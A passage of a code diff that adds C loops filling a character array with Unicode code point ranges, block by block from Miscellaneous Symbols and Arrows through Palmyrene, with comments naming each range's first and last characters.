+	c = 0x2bca;		// from TOP HALF BLACK CIRCLE
+	while (c <= 0x2bfe)	// ..to REVERSED RIGHT ANGLE
+		charset[i++] = c++;
+// 2C00..2C5F; Glagolitic
+	c = 0x2c00;		// from GLAGOLITIC CAPITAL LETTER AZU
+	while (c <= 0x2c2e)	// ..to GLAGOLITIC CAPITAL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+	c = 0x2c30;		// from GLAGOLITIC SMALL LETTER AZU
+	while (c <= 0x2c5e)	// ..to GLAGOLITIC SMALL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+// 2C60..2C7F; Latin Extended-C
+	c = 0x2c60;		// from LATIN CAPITAL LETTER L WITH DOUBLE BAR
+	while (c <= 0x2c7f)	// ..to LATIN CAPITAL LETTER Z WITH SWASH TAIL
+		charset[i++] = c++;
+// 2C80..2CFF; Coptic
+	c = 0x2c80;		// from COPTIC CAPITAL LETTER ALFA
+	while (c <= 0x2cf3)	// ..to COPTIC SMALL LETTER BOHAIRIC KHEI
+		charset[i++] = c++;
+	c = 0x2cf9;		// from COPTIC OLD NUBIAN FULL STOP
+	while (c <= 0x2cff)	// ..to COPTIC MORPHOLOGICAL DIVIDER
+		charset[i++] = c++;
+// 2D00..2D2F; Georgian Supplement
+	c = 0x2d00;		// from GEORGIAN SMALL LETTER AN
+	while (c <= 0x2d25)	// ..to GEORGIAN SMALL LETTER HOE
+		charset[i++] = c++;
+	c = 0x2d27;		// from GEORGIAN SMALL LETTER YN
+	while (c <= 0x2d2d)	// ..to GEORGIAN SMALL LETTER AEN
+		charset[i++] = c++;
+// 2D30..2D7F; Tifinagh
+	c = 0x2d30;		// from TIFINAGH LETTER YA
+	while (c <= 0x2d67)	// ..to TIFINAGH LETTER YO
+		charset[i++] = c++;
+	charset[i++] = 0x2d6f;	// TIFINAGH MODIFIER LETTER LABIALIZATION MARK
+	charset[i++] = 0x2d70;	// TIFINAGH SEPARATOR MARK
+	charset[i++] = 0x2d7f;	// TIFINAGH CONSONANT JOINER
+// 2D80..2DDF; Ethiopic Extended
+	c = 0x2d80;		// from ETHIOPIC SYLLABLE LOA
+	while (c <= 0x2d96)	// ..to ETHIOPIC SYLLABLE GGWE
+		charset[i++] = c++;
+	c = 0x2da0;		// from ETHIOPIC SYLLABLE SSA
+	while (c <= 0x2da6)	// ..to ETHIOPIC SYLLABLE SSO
+		charset[i++] = c++;
+	c = 0x2da8;		// from ETHIOPIC SYLLABLE CCA
+	while (c <= 0x2dae)	// ..to ETHIOPIC SYLLABLE CCO
+		charset[i++] = c++;
+	c = 0x2db0;		// from ETHIOPIC SYLLABLE ZZA
+	while (c <= 0x2db6)	// ..to ETHIOPIC SYLLABLE ZZO
+		charset[i++] = c++;
+	c = 0x2db8;		// from ETHIOPIC SYLLABLE CCHA
+	while (c <= 0x2dbe)	// ..to ETHIOPIC SYLLABLE CCHO
+		charset[i++] = c++;
+	c = 0x2dc0;		// from ETHIOPIC SYLLABLE QYA
+	while (c <= 0x2dc6)	// ..to ETHIOPIC SYLLABLE QYO
+		charset[i++] = c++;
+	c = 0x2dc8;		// from ETHIOPIC SYLLABLE KYA
+	while (c <= 0x2dce)	// ..to ETHIOPIC SYLLABLE KYO
+		charset[i++] = c++;
+	c = 0x2dd0;		// from ETHIOPIC SYLLABLE XYA
+	while (c <= 0x2dd6)	// ..to ETHIOPIC SYLLABLE XYO
+		charset[i++] = c++;
+	c = 0x2dd8;		// from ETHIOPIC SYLLABLE GYA
+	while (c <= 0x2dde)	// ..to ETHIOPIC SYLLABLE GYO
+		charset[i++] = c++;
+// 2DE0..2DFF; Cyrillic Extended-A
+	c = 0x2de0;		// from COMBINING CYRILLIC LETTER BE
+	while (c <= 0x2dff)	// ..to COMBINING CYRILLIC LETTER IOTIFIED BIG YUS
+		charset[i++] = c++;
+// 2E00..2E7F; Supplemental Punctuation
+	c = 0x2e00;		// from RIGHT ANGLE SUBSTITUTION MARKER
+	while (c <= 0x2e4e)	// ..to PUNCTUS ELEVATUS MARK
+		charset[i++] = c++;
+// 2E80..2EFF; CJK Radicals Supplement
+	c = 0x2e80;		// from CJK RADICAL REPEAT
+	while (c <= 0x2e99)	// ..to CJK RADICAL RAP
+		charset[i++] = c++;
+	c = 0x2e9b;		// from CJK RADICAL CHOKE
+	while (c <= 0x2ef3)	// ..to CJK RADICAL C-SIMPLIFIED TURTLE
+		charset[i++] = c++;
+// 2F00..2FDF; Kangxi Radicals
+	c = 0x2f00;		// from KANGXI RADICAL ONE
+	while (c <= 0x2fd5)	// ..to KANGXI RADICAL FLUTE
+		charset[i++] = c++;
+// 2FF0..2FFF; Ideographic Description Characters
+	c = 0x2ff0;		// from IDEOGRAPHIC DESCRIPTION CHARACTER LEFT TO RIGHT
+	while (c <= 0x2ffb)	// ..to IDEOGRAPHIC DESCRIPTION CHARACTER OVERLAID
+		charset[i++] = c++;
+// 3000..303F; CJK Symbols and Punctuation
+	c = 0x3000;		// from IDEOGRAPHIC SPACE
+	while (c <= 0x303f)	// ..to IDEOGRAPHIC HALF FILL SPACE
+		charset[i++] = c++;
+// 3040..309F; Hiragana
+	c = 0x3041;		// from HIRAGANA LETTER SMALL A
+	while (c <= 0x3096)	// ..to HIRAGANA LETTER SMALL KE
+		charset[i++] = c++;
+	c = 0x3099;		// from COMBINING KATAKANA-HIRAGANA VOICED SOUND MARK
+	while (c <= 0x309f)	// ..to HIRAGANA DIGRAPH YORI
+		charset[i++] = c++;
+// 30A0..30FF; Katakana
+	c = 0x30a0;		// from KATAKANA-HIRAGANA DOUBLE HYPHEN
+	while (c <= 0x30ff)	// ..to KATAKANA DIGRAPH KOTO
+		charset[i++] = c++;
+// 3100..312F; Bopomofo
+	c = 0x3105;		// from BOPOMOFO LETTER B
+	while (c <= 0x312f)	// ..to BOPOMOFO LETTER NN
+		charset[i++] = c++;
+// 3130..318F; Hangul Compatibility Jamo
+	c = 0x3131;		// from HANGUL LETTER KIYEOK
+	while (c <= 0x318e)	// ..to HANGUL LETTER ARAEAE
+		charset[i++] = c++;
+// 3190..319F; Kanbun
+	c = 0x3190;		// from IDEOGRAPHIC ANNOTATION LINKING MARK
+	while (c <= 0x319f)	// ..to IDEOGRAPHIC ANNOTATION MAN MARK
+		charset[i++] = c++;
+// 31A0..31BF; Bopomofo Extended
+	c = 0x31a0;		// from BOPOMOFO LETTER BU
+	while (c <= 0x31ba)	// ..to BOPOMOFO LETTER ZY
+		charset[i++] = c++;
+// 31C0..31EF; CJK Strokes
+	c = 0x31c0;		// from CJK STROKE T
+	while (c <= 0x31e3)	// ..to CJK STROKE Q
+		charset[i++] = c++;
+// 31F0..31FF; Katakana Phonetic Extensions
+	c = 0x31f0;		// from KATAKANA LETTER SMALL KU
+	while (c <= 0x31ff)	// ..to KATAKANA LETTER SMALL RO
+		charset[i++] = c++;
+// 3200..32FF; Enclosed CJK Letters and Months
+	c = 0x3200;		// from PARENTHESIZED HANGUL KIYEOK
+	while (c <= 0x321e)	// ..to PARENTHESIZED KOREAN CHARACTER O HU
+		charset[i++] = c++;
+	c = 0x3220;		// from PARENTHESIZED IDEOGRAPH ONE
+	while (c <= 0x32fe)	// ..to CIRCLED KATAKANA WO
+		charset[i++] = c++;
+// 3300..33FF; CJK Compatibility
+	c = 0x3300;		// from SQUARE APAATO
+	while (c <= 0x33ff)	// ..to SQUARE GAL
+		charset[i++] = c++;
+// 3400..4DBF; CJK Unified Ideographs Extension A
+	c = 0x3400;		// from <CJK Ideograph Extension A, First>
+	while (c <= 0x4db5)	// ..to <CJK Ideograph Extension A, Last>
+		charset[i++] = c++;
+// 4DC0..4DFF; Yijing Hexagram Symbols
+	c = 0x4dc0;		// from HEXAGRAM FOR THE CREATIVE HEAVEN
+	while (c <= 0x4dff)	// ..to HEXAGRAM FOR BEFORE COMPLETION
+		charset[i++] = c++;
+// 4E00..9FFF; CJK Unified Ideographs
+	c = 0x4e00;		// from <CJK Ideograph, First>
+	while (c <= 0x9fef)	// ..to <CJK Ideograph, Last>
+		charset[i++] = c++;
+// A000..A48F; Yi Syllables
+	c = 0xa000;		// from YI SYLLABLE IT
+	while (c <= 0xa48c)	// ..to YI SYLLABLE YYR
+		charset[i++] = c++;
+// A490..A4CF; Yi Radicals
+	c = 0xa490;		// from YI RADICAL QOT
+	while (c <= 0xa4c6)	// ..to YI RADICAL KE
+		charset[i++] = c++;
+// A4D0..A4FF; Lisu
+	c = 0xa4d0;		// from LISU LETTER BA
+	while (c <= 0xa4ff)	// ..to LISU PUNCTUATION FULL STOP
+		charset[i++] = c++;
+// A500..A63F; Vai
+	c = 0xa500;		// from VAI SYLLABLE EE
+	while (c <= 0xa62b)	// ..to VAI SYLLABLE NDOLE DO
+		charset[i++] = c++;
+// A640..A69F; Cyrillic Extended-B
+	c = 0xa640;		// from CYRILLIC CAPITAL LETTER ZEMLYA
+	while (c <= 0xa69f)	// ..to COMBINING CYRILLIC LETTER IOTIFIED E
+		charset[i++] = c++;
+// A6A0..A6FF; Bamum
+	c = 0xa6a0;		// from BAMUM LETTER A
+	while (c <= 0xa6f7)	// ..to BAMUM QUESTION MARK
+		charset[i++] = c++;
+// A700..A71F; Modifier Tone Letters
+	c = 0xa700;		// from MODIFIER LETTER CHINESE TONE YIN PING
+	while (c <= 0xa71f)	// ..to MODIFIER LETTER LOW INVERTED EXCLAMATION MARK
+		charset[i++] = c++;
+// A720..A7FF; Latin Extended-D
+	c = 0xa720;		// from MODIFIER LETTER STRESS AND HIGH TONE
+	while (c <= 0xa7b9)	// ..to LATIN SMALL LETTER U WITH STROKE
+		charset[i++] = c++;
+	c = 0xa7f7;		// from LATIN EPIGRAPHIC LETTER SIDEWAYS I
+	while (c <= 0xa7ff)	// ..to LATIN EPIGRAPHIC LETTER ARCHAIC M
+		charset[i++] = c++;
+// A800..A82F; Syloti Nagri
+	c = 0xa800;		// from SYLOTI NAGRI LETTER A
+	while (c <= 0xa82b)	// ..to SYLOTI NAGRI POETRY MARK-4
+		charset[i++] = c++;
+// A830..A83F; Common Indic Number Forms
+	c = 0xa830;		// from NORTH INDIC FRACTION ONE QUARTER
+	while (c <= 0xa839)	// ..to NORTH INDIC QUANTITY MARK
+		charset[i++] = c++;
+// A840..A87F; Phags-pa
+	c = 0xa840;		// from PHAGS-PA LETTER KA
+	while (c <= 0xa877)	// ..to PHAGS-PA MARK DOUBLE SHAD
+		charset[i++] = c++;
+// A880..A8DF; Saurashtra
+	c = 0xa880;		// from SAURASHTRA SIGN ANUSVARA
+	while (c <= 0xa8c5)	// ..to SAURASHTRA SIGN CANDRABINDU
+		charset[i++] = c++;
+	c = 0xa8ce;		// from SAURASHTRA DANDA
+	while (c <= 0xa8d9)	// ..to SAURASHTRA DIGIT NINE
+		charset[i++] = c++;
+// A8E0..A8FF; Devanagari Extended
+	c = 0xa8e0;		// from COMBINING DEVANAGARI DIGIT ZERO
+	while (c <= 0xa8ff)	// ..to DEVANAGARI VOWEL SIGN AY
+		charset[i++] = c++;
+// A900..A92F; Kayah Li
+	c = 0xa900;		// from KAYAH LI DIGIT ZERO
+	while (c <= 0xa92f)	// ..to KAYAH LI SIGN SHYA
+		charset[i++] = c++;
+// A930..A95F; Rejang
+	c = 0xa930;		// from REJANG LETTER KA
+	while (c <= 0xa953)	// ..to REJANG VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xa95f;	// REJANG SECTION MARK
+// A960..A97F; Hangul Jamo Extended-A
+	c = 0xa960;		// from HANGUL CHOSEONG TIKEUT-MIEUM
+	while (c <= 0xa97c)	// ..to HANGUL CHOSEONG SSANGYEORINHIEUH
+		charset[i++] = c++;
+// A980..A9DF; Javanese
+	c = 0xa980;		// from JAVANESE SIGN PANYANGGA
+	while (c <= 0xa9cd)	// ..to JAVANESE TURNED PADA PISELEH
+		charset[i++] = c++;
+	c = 0xa9cf;		// from JAVANESE PANGRANGKEP
+	while (c <= 0xa9d9)	// ..to JAVANESE DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xa9de;	// JAVANESE PADA TIRTA TUMETES
+	charset[i++] = 0xa9df;	// JAVANESE PADA ISEN-ISEN
+// A9E0..A9FF; Myanmar Extended-B
+	c = 0xa9e0;		// from MYANMAR LETTER SHAN GHA
+	while (c <= 0xa9fe)	// ..to MYANMAR LETTER TAI LAING BHA
+		charset[i++] = c++;
+// AA00..AA5F; Cham
+	c = 0xaa00;		// from CHAM LETTER A
+	while (c <= 0xaa36)	// ..to CHAM CONSONANT SIGN WA
+		charset[i++] = c++;
+	c = 0xaa40;		// from CHAM LETTER FINAL K
+	while (c <= 0xaa4d)	// ..to CHAM CONSONANT SIGN FINAL H
+		charset[i++] = c++;
+	c = 0xaa50;		// from CHAM DIGIT ZERO
+	while (c <= 0xaa59)	// ..to CHAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0xaa5c;		// from CHAM PUNCTUATION SPIRAL
+	while (c <= 0xaa5f)	// ..to CHAM PUNCTUATION TRIPLE DANDA
+		charset[i++] = c++;
+// AA60..AA7F; Myanmar Extended-A
+	c = 0xaa60;		// from MYANMAR LETTER KHAMTI GA
+	while (c <= 0xaa7f)	// ..to MYANMAR LETTER SHWE PALAUNG SHA
+		charset[i++] = c++;
+// AA80..AADF; Tai Viet
+	c = 0xaa80;		// from TAI VIET LETTER LOW KO
+	while (c <= 0xaac2)	// ..to TAI VIET TONE MAI SONG
+		charset[i++] = c++;
+	c = 0xaadb;		// from TAI VIET SYMBOL KON
+	while (c <= 0xaadf)	// ..to TAI VIET SYMBOL KOI KOI
+		charset[i++] = c++;
+// AAE0..AAFF; Meetei Mayek Extensions
+	c = 0xaae0;		// from MEETEI MAYEK LETTER E
+	while (c <= 0xaaf6)	// ..to MEETEI MAYEK VIRAMA
+		charset[i++] = c++;
+// AB00..AB2F; Ethiopic Extended-A
+	c = 0xab01;		// from ETHIOPIC SYLLABLE TTHU
+	while (c <= 0xab06)	// ..to ETHIOPIC SYLLABLE TTHO
+		charset[i++] = c++;
+	c = 0xab09;		// from ETHIOPIC SYLLABLE DDHU
+	while (c <= 0xab0e)	// ..to ETHIOPIC SYLLABLE DDHO
+		charset[i++] = c++;
+	c = 0xab11;		// from ETHIOPIC SYLLABLE DZU
+	while (c <= 0xab16)	// ..to ETHIOPIC SYLLABLE DZO
+		charset[i++] = c++;
+	c = 0xab20;		// from ETHIOPIC SYLLABLE CCHHA
+	while (c <= 0xab26)	// ..to ETHIOPIC SYLLABLE CCHHO
+		charset[i++] = c++;
+	c = 0xab28;		// from ETHIOPIC SYLLABLE BBA
+	while (c <= 0xab2e)	// ..to ETHIOPIC SYLLABLE BBO
+		charset[i++] = c++;
+// AB30..AB6F; Latin Extended-E
+	c = 0xab30;		// from LATIN SMALL LETTER BARRED ALPHA
+	while (c <= 0xab65)	// ..to GREEK LETTER SMALL CAPITAL OMEGA
+		charset[i++] = c++;
+// AB70..ABBF; Cherokee Supplement
+	c = 0xab70;		// from CHEROKEE SMALL LETTER A
+	while (c <= 0xabbf)	// ..to CHEROKEE SMALL LETTER YA
+		charset[i++] = c++;
+// ABC0..ABFF; Meetei Mayek
+	c = 0xabc0;		// from MEETEI MAYEK LETTER KOK
+	while (c <= 0xabed)	// ..to MEETEI MAYEK APUN IYEK
+		charset[i++] = c++;
+	c = 0xabf0;		// from MEETEI MAYEK DIGIT ZERO
+	while (c <= 0xabf9)	// ..to MEETEI MAYEK DIGIT NINE
+		charset[i++] = c++;
+// AC00..D7AF; Hangul Syllables
+	c = 0xac00;		// from <Hangul Syllable, First>
+	while (c <= 0xd7a3)	// ..to <Hangul Syllable, Last>
+		charset[i++] = c++;
+// D7B0..D7FF; Hangul Jamo Extended-B
+	c = 0xd7b0;		// from HANGUL JUNGSEONG O-YEO
+	while (c <= 0xd7c6)	// ..to HANGUL JUNGSEONG ARAEA-E
+		charset[i++] = c++;
+	c = 0xd7cb;		// from HANGUL JONGSEONG NIEUN-RIEUL
+	while (c <= 0xd7fb)	// ..to HANGUL JONGSEONG PHIEUPH-THIEUTH
+		charset[i++] = c++;
+// D800..DB7F; High Surrogates
+// DB80..DBFF; High Private Use Surrogates
+// DC00..DFFF; Low Surrogates
+// E000..F8FF; Private Use Area
+// F900..FAFF; CJK Compatibility Ideographs
+	c = 0xf900;		// from CJK COMPATIBILITY IDEOGRAPH-F900
+	while (c <= 0xfa6d)	// ..to CJK COMPATIBILITY IDEOGRAPH-FA6D
+		charset[i++] = c++;
+	c = 0xfa70;		// from CJK COMPATIBILITY IDEOGRAPH-FA70
+	while (c <= 0xfad9)	// ..to CJK COMPATIBILITY IDEOGRAPH-FAD9
+		charset[i++] = c++;
+// FB00..FB4F; Alphabetic Presentation Forms
+	c = 0xfb00;		// from LATIN SMALL LIGATURE FF
+	while (c <= 0xfb06)	// ..to LATIN SMALL LIGATURE ST
+		charset[i++] = c++;
+	c = 0xfb13;		// from ARMENIAN SMALL LIGATURE MEN NOW
+	while (c <= 0xfb17)	// ..to ARMENIAN SMALL LIGATURE MEN XEH
+		charset[i++] = c++;
+	c = 0xfb1d;		// from HEBREW LETTER YOD WITH HIRIQ
+	while (c <= 0xfb36)	// ..to HEBREW LETTER ZAYIN WITH DAGESH
+		charset[i++] = c++;
+	c = 0xfb38;		// from HEBREW LETTER TET WITH DAGESH
+	while (c <= 0xfb3c)	// ..to HEBREW LETTER LAMED WITH DAGESH
+		charset[i++] = c++;
+	charset[i++] = 0xfb40;	// HEBREW LETTER NUN WITH DAGESH
+	charset[i++] = 0xfb41;	// HEBREW LETTER SAMEKH WITH DAGESH
+	charset[i++] = 0xfb43;	// HEBREW LETTER FINAL PE WITH DAGESH
+	charset[i++] = 0xfb44;	// HEBREW LETTER PE WITH DAGESH
+	c = 0xfb46;		// from HEBREW LETTER TSADI WITH DAGESH
+	while (c <= 0xfb4f)	// ..to HEBREW LIGATURE ALEF LAMED
+		charset[i++] = c++;
+// FB50..FDFF; Arabic Presentation Forms-A
+	c = 0xfb50;		// from ARABIC LETTER ALEF WASLA ISOLATED FORM
+	while (c <= 0xfbc1)	// ..to ARABIC SYMBOL SMALL TAH BELOW
+		charset[i++] = c++;
+	c = 0xfbd3;		// from ARABIC LETTER NG ISOLATED FORM
+	while (c <= 0xfd3f)	// ..to ORNATE RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0xfd50;		// from ARABIC LIGATURE TEH WITH JEEM WITH MEEM INITIAL FORM
+	while (c <= 0xfd8f)	// ..to ARABIC LIGATURE MEEM WITH KHAH WITH MEEM INITIAL FORM
+		charset[i++] = c++;
+	c = 0xfd92;		// from ARABIC LIGATURE MEEM WITH JEEM WITH KHAH INITIAL FORM
+	while (c <= 0xfdc7)	// ..to ARABIC LIGATURE NOON WITH JEEM WITH YEH FINAL FORM
+		charset[i++] = c++;
+	c = 0xfdf0;		// from ARABIC LIGATURE SALLA USED AS KORANIC STOP SIGN ISOLATED FORM
+	while (c <= 0xfdfd)	// ..to ARABIC LIGATURE BISMILLAH AR-RAHMAN AR-RAHEEM
+		charset[i++] = c++;
+// FE00..FE0F; Variation Selectors
+	c = 0xfe00;		// from VARIATION SELECTOR-1
+	while (c <= 0xfe0f)	// ..to VARIATION SELECTOR-16
+		charset[i++] = c++;
+// FE10..FE1F; Vertical Forms
+	c = 0xfe10;		// from PRESENTATION FORM FOR VERTICAL COMMA
+	while (c <= 0xfe19)	// ..to PRESENTATION FORM FOR VERTICAL HORIZONTAL ELLIPSIS
+		charset[i++] = c++;
+// FE20..FE2F; Combining Half Marks
+	c = 0xfe20;		// from COMBINING LIGATURE LEFT HALF
+	while (c <= 0xfe2f)	// ..to COMBINING CYRILLIC TITLO RIGHT HALF
+		charset[i++] = c++;
+// FE30..FE4F; CJK Compatibility Forms
+	c = 0xfe30;		// from PRESENTATION FORM FOR VERTICAL TWO DOT LEADER
+	while (c <= 0xfe4f)	// ..to WAVY LOW LINE
+		charset[i++] = c++;
+// FE50..FE6F; Small Form Variants
+	charset[i++] = 0xfe50;	// SMALL COMMA
+	charset[i++] = 0xfe52;	// SMALL FULL STOP
+	c = 0xfe54;		// from SMALL SEMICOLON
+	while (c <= 0xfe66)	// ..to SMALL EQUALS SIGN
+		charset[i++] = c++;
+	c = 0xfe68;		// from SMALL REVERSE SOLIDUS
+	while (c <= 0xfe6b)	// ..to SMALL COMMERCIAL AT
+		charset[i++] = c++;
+// FE70..FEFF; Arabic Presentation Forms-B
+	c = 0xfe70;		// from ARABIC FATHATAN ISOLATED FORM
+	while (c <= 0xfe74)	// ..to ARABIC KASRATAN ISOLATED FORM
+		charset[i++] = c++;
+	c = 0xfe76;		// from ARABIC FATHA ISOLATED FORM
+	while (c <= 0xfefc)	// ..to ARABIC LIGATURE LAM WITH ALEF FINAL FORM
+		charset[i++] = c++;
+	charset[i++] = 0xfeff;	// ZERO WIDTH NO-BREAK SPACE
+// FF00..FFEF; Halfwidth and Fullwidth Forms
+	c = 0xff01;		// from FULLWIDTH EXCLAMATION MARK
+	while (c <= 0xffbe)	// ..to HALFWIDTH HANGUL LETTER HIEUH
+		charset[i++] = c++;
+	c = 0xffc2;		// from HALFWIDTH HANGUL LETTER A
+	while (c <= 0xffc7)	// ..to HALFWIDTH HANGUL LETTER E
+		charset[i++] = c++;
+	c = 0xffca;		// from HALFWIDTH HANGUL LETTER YEO
+	while (c <= 0xffcf)	// ..to HALFWIDTH HANGUL LETTER OE
+		charset[i++] = c++;
+	c = 0xffd2;		// from HALFWIDTH HANGUL LETTER YO
+	while (c <= 0xffd7)	// ..to HALFWIDTH HANGUL LETTER YU
+		charset[i++] = c++;
+	charset[i++] = 0xffda;	// HALFWIDTH HANGUL LETTER EU
+	charset[i++] = 0xffdc;	// HALFWIDTH HANGUL LETTER I
+	c = 0xffe0;		// from FULLWIDTH CENT SIGN
+	while (c <= 0xffe6)	// ..to FULLWIDTH WON SIGN
+		charset[i++] = c++;
+	c = 0xffe8;		// from HALFWIDTH FORMS LIGHT VERTICAL
+	while (c <= 0xffee)	// ..to HALFWIDTH WHITE CIRCLE
+		charset[i++] = c++;
+// FFF0..FFFF; Specials
+	c = 0xfff9;		// from INTERLINEAR ANNOTATION ANCHOR
+	while (c <= 0xfffd)	// ..to REPLACEMENT CHARACTER
+		charset[i++] = c++;
+// 10000..1007F; Linear B Syllabary
+	c = 0x10000;		// from LINEAR B SYLLABLE B008 A
+	while (c <= 0x1000b)	// ..to LINEAR B SYLLABLE B046 JE
+		charset[i++] = c++;
+	c = 0x1000d;		// from LINEAR B SYLLABLE B036 JO
+	while (c <= 0x10026)	// ..to LINEAR B SYLLABLE B032 QO
+		charset[i++] = c++;
+	c = 0x10028;		// from LINEAR B SYLLABLE B060 RA
+	while (c <= 0x1003a)	// ..to LINEAR B SYLLABLE B042 WO
+		charset[i++] = c++;
+	charset[i++] = 0x1003c;	// LINEAR B SYLLABLE B017 ZA
+	charset[i++] = 0x1003d;	// LINEAR B SYLLABLE B074 ZE
+	c = 0x1003f;		// from LINEAR B SYLLABLE B020 ZO
+	while (c <= 0x1004d)	// ..to LINEAR B SYLLABLE B091 TWO
+		charset[i++] = c++;
+	c = 0x10050;		// from LINEAR B SYMBOL B018
+	while (c <= 0x1005d)	// ..to LINEAR B SYMBOL B089
+		charset[i++] = c++;
+// 10080..100FF; Linear B Ideograms
+	c = 0x10080;		// from LINEAR B IDEOGRAM B100 MAN
+	while (c <= 0x100fa)	// ..to LINEAR B IDEOGRAM VESSEL B305
+		charset[i++] = c++;
+// 10100..1013F; Aegean Numbers
+	charset[i++] = 0x10100;	// AEGEAN WORD SEPARATOR LINE
+	charset[i++] = 0x10102;	// AEGEAN CHECK MARK
+	c = 0x10107;		// from AEGEAN NUMBER ONE
+	while (c <= 0x10133)	// ..to AEGEAN NUMBER NINETY THOUSAND
+		charset[i++] = c++;
+	c = 0x10137;		// from AEGEAN WEIGHT BASE UNIT
+	while (c <= 0x1013f)	// ..to AEGEAN MEASURE THIRD SUBUNIT
+		charset[i++] = c++;
+// 10140..1018F; Ancient Greek Numbers
+	c = 0x10140;		// from GREEK ACROPHONIC ATTIC ONE QUARTER
+	while (c <= 0x1018e)	// ..to NOMISMA SIGN
+		charset[i++] = c++;
+// 10190..101CF; Ancient Symbols
+	c = 0x10190;		// from ROMAN SEXTANS SIGN
+	while (c <= 0x1019b)	// ..to ROMAN CENTURIAL SIGN
+		charset[i++] = c++;
+	charset[i++] = 0x101a0;	// GREEK SYMBOL TAU RHO
+// 101D0..101FF; Phaistos Disc
+	c = 0x101d0;		// from PHAISTOS DISC SIGN PEDESTRIAN
+	while (c <= 0x101fd)	// ..to PHAISTOS DISC SIGN COMBINING OBLIQUE STROKE
+		charset[i++] = c++;
+// 10280..1029F; Lycian
+	c = 0x10280;		// from LYCIAN LETTER A
+	while (c <= 0x1029c)	// ..to LYCIAN LETTER X
+		charset[i++] = c++;
+// 102A0..102DF; Carian
+	c = 0x102a0;		// from CARIAN LETTER A
+	while (c <= 0x102d0)	// ..to CARIAN LETTER UUU3
+		charset[i++] = c++;
+// 102E0..102FF; Coptic Epact Numbers
+	c = 0x102e0;		// from COPTIC EPACT THOUSANDS MARK
+	while (c <= 0x102fb)	// ..to COPTIC EPACT NUMBER NINE HUNDRED
+		charset[i++] = c++;
+// 10300..1032F; Old Italic
+	c = 0x10300;		// from OLD ITALIC LETTER A
+	while (c <= 0x10323)	// ..to OLD ITALIC NUMERAL FIFTY
+		charset[i++] = c++;
+	charset[i++] = 0x1032d;	// OLD ITALIC LETTER YE
+	charset[i++] = 0x1032f;	// OLD ITALIC LETTER SOUTHERN TSE
+// 10330..1034F; Gothic
+	c = 0x10330;		// from GOTHIC LETTER AHSA
+	while (c <= 0x1034a)	// ..to GOTHIC LETTER NINE HUNDRED
+		charset[i++] = c++;
+// 10350..1037F; Old Permic
+	c = 0x10350;		// from OLD PERMIC LETTER AN
+	while (c <= 0x1037a)	// ..to COMBINING OLD PERMIC LETTER SII
+		charset[i++] = c++;
+// 10380..1039F; Ugaritic
+	c = 0x10380;		// from UGARITIC LETTER ALPA
+	while (c <= 0x1039d)	// ..to UGARITIC LETTER SSU
+		charset[i++] = c++;
+	charset[i++] = 0x1039f;	// UGARITIC WORD DIVIDER
+// 103A0..103DF; Old Persian
+	c = 0x103a0;		// from OLD PERSIAN SIGN A
+	while (c <= 0x103c3)	// ..to OLD PERSIAN SIGN HA
+		charset[i++] = c++;
+	c = 0x103c8;		// from OLD PERSIAN SIGN AURAMAZDAA
+	while (c <= 0x103d5)	// ..to OLD PERSIAN NUMBER HUNDRED
+		charset[i++] = c++;
+// 10400..1044F; Deseret
+	c = 0x10400;		// from DESERET CAPITAL LETTER LONG I
+	while (c <= 0x1044f)	// ..to DESERET SMALL LETTER EW
+		charset[i++] = c++;
+// 10450..1047F; Shavian
+	c = 0x10450;		// from SHAVIAN LETTER PEEP
+	while (c <= 0x1047f)	// ..to SHAVIAN LETTER YEW
+		charset[i++] = c++;
+// 10480..104AF; Osmanya
+	c = 0x10480;		// from OSMANYA LETTER ALEF
+	while (c <= 0x1049d)	// ..to OSMANYA LETTER OO
+		charset[i++] = c++;
+	c = 0x104a0;		// from OSMANYA DIGIT ZERO
+	while (c <= 0x104a9)	// ..to OSMANYA DIGIT NINE
+		charset[i++] = c++;
+// 104B0..104FF; Osage
+	c = 0x104b0;		// from OSAGE CAPITAL LETTER A
+	while (c <= 0x104d3)	// ..to OSAGE CAPITAL LETTER ZHA
+		charset[i++] = c++;
+	c = 0x104d8;		// from OSAGE SMALL LETTER A
+	while (c <= 0x104fb)	// ..to OSAGE SMALL LETTER ZHA
+		charset[i++] = c++;
+// 10500..1052F; Elbasan
+	c = 0x10500;		// from ELBASAN LETTER A
+	while (c <= 0x10527)	// ..to ELBASAN LETTER KHE
+		charset[i++] = c++;
+// 10530..1056F; Caucasian Albanian
+	c = 0x10530;		// from CAUCASIAN ALBANIAN LETTER ALT
+	while (c <= 0x10563)	// ..to CAUCASIAN ALBANIAN LETTER KIW
+		charset[i++] = c++;
+	charset[i++] = 0x1056f;	// CAUCASIAN ALBANIAN CITATION MARK
+// 10600..1077F; Linear A
+	c = 0x10600;		// from LINEAR A SIGN AB001
+	while (c <= 0x10736)	// ..to LINEAR A SIGN A664
+		charset[i++] = c++;
+	c = 0x10740;		// from LINEAR A SIGN A701 A
+	while (c <= 0x10755)	// ..to LINEAR A SIGN A732 JE
+		charset[i++] = c++;
+	c = 0x10760;		// from LINEAR A SIGN A800
+	while (c <= 0x10767)	// ..to LINEAR A SIGN A807
+		charset[i++] = c++;
+// 10800..1083F; Cypriot Syllabary
+	c = 0x10800;		// from CYPRIOT SYLLABLE A
+	while (c <= 0x10805)	// ..to CYPRIOT SYLLABLE JA
+		charset[i++] = c++;
+	c = 0x1080a;		// from CYPRIOT SYLLABLE KA
+	while (c <= 0x10835)	// ..to CYPRIOT SYLLABLE WO
+		charset[i++] = c++;
+	charset[i++] = 0x10837;	// CYPRIOT SYLLABLE XA
+	charset[i++] = 0x10838;	// CYPRIOT SYLLABLE XE
+	c = 0x1083c;		// from CYPRIOT SYLLABLE ZA
+	while (c <= 0x1083f)	// ..to CYPRIOT SYLLABLE ZO
+		charset[i++] = c++;
+// 10840..1085F; Imperial Aramaic
+	c = 0x10840;		// from IMPERIAL ARAMAIC LETTER ALEPH
+	while (c <= 0x10855)	// ..to IMPERIAL ARAMAIC LETTER TAW
+		charset[i++] = c++;
+	c = 0x10857;		// from IMPERIAL ARAMAIC SECTION SIGN
+	while (c <= 0x1085f)	// ..to IMPERIAL ARAMAIC NUMBER TEN THOUSAND
+		charset[i++] = c++;
+// 10860..1087F; Palmyrene
+	c = 0x10860;		// from PALMYRENE LETTER ALEPH
